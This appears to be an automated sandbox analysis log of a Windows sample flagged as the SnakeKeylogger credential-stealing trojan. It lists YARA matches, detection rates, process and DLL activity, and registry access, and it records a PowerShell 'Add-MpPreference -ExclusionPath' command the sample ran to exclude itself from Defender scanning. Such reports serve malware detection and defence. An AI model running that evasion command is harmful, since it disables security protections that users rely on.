                    Source: Yef4EqsQha.exe, 00000000.00000002.1389923913.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1395225063.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1396378200.0000000008C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1384875417.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000000.1369273436.00000000007D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUIQk.exeJ vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000006.00000002.3843065148.0000000006A99000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exeBinary or memory string: OriginalFilenameUIQk.exeJ vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Yef4EqsQha.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/8@5/3
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Yef4EqsQha.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMutant created: \Sessions\1\BaseNamedObjects\Xqxqbe
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvnqseku.25h.ps1Jump to behavior
                    Source: Yef4EqsQha.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Yef4EqsQha.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Yef4EqsQha.exeReversingLabs: Detection: 82%
                    Source: Yef4EqsQha.exeVirustotal: Detection: 70%
                    Source: unknownProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yef4EqsQha.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Yef4EqsQha.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Yef4EqsQha.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: UIQk.pdbSHA256 source: Yef4EqsQha.exe
                    Source: Binary string: UIQk.pdb source: Yef4EqsQha.exe
                    Source: Yef4EqsQha.exeStatic PE information: 0xA6F3EF70 [Sat Oct 5 00:46:40 2058 UTC]
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF891E pushad ; iretd 6_2_00DF891F
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF8C2F pushfd ; iretd 6_2_00DF8C30
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF8DDF push esp; iretd 6_2_00DF8DE0
                    Source: Yef4EqsQha.exeStatic PE information: section name: .text entropy: 7.615593459072145

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
